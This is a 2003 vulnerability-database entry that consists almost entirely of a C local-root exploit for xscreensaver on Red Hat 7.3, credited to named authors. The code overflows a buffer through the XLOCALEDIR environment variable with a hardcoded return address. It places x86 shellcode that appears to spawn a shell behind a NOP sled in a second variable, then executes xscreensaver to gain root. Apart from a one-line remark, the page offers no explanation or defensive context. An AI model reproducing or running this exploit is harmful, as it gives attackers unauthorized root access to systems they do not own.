xscreensaver exploit for Redhat 7.3

2003-03-07T00:00:00
ID SECURITYVULNS:DOC:4170
Type securityvulns
Reporter Securityvulns
Modified 2003-03-07T00:00:00

Description

I think you don't need other comments:

/ Tested on rh 7.3 using XFree86 xscreensaver vulnerability AUTHORS: Angelo Rosiello (Guilecool) & deka REQUIRES: X must be run! EFFECTS: local root exploit! deka is leet brother, thank you :> MAIL: guilecool@usa.com /

include <stdio.h>

include <string.h>

include <unistd.h>

include <stdlib.h>

include <sys/types.h>

include <sys/stat.h>

include <fcntl.h>

define RETADDR 0xbfffdf20 //change it if u need

char shellcode[] = "\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc" "\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd" "\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb" "\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45" "\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89" "\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31" "\xc0\x40\xcd\x80";

int main() { char buf[4076]; unsigned long retaddr = RETADDR;

    memset&#40;buf, 0x0, 4076&#41;;
    memset&#40;buf, 0x41, 4072&#41;;
    memcpy&#40;buf+2076, &retaddr, 0x4&#41;;
    setenv&#40;&quot;XLOCALEDIR&quot;, buf, 1&#41;;
    memset&#40;buf, 0x90, 4072&#41;;
    memcpy&#40;&#40;buf+4072-strlen&#40;shellcode&#41;&#41;, shellcode, strlen

(shellcode)); setenv("HAXHAX", buf, 1); execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", 0); }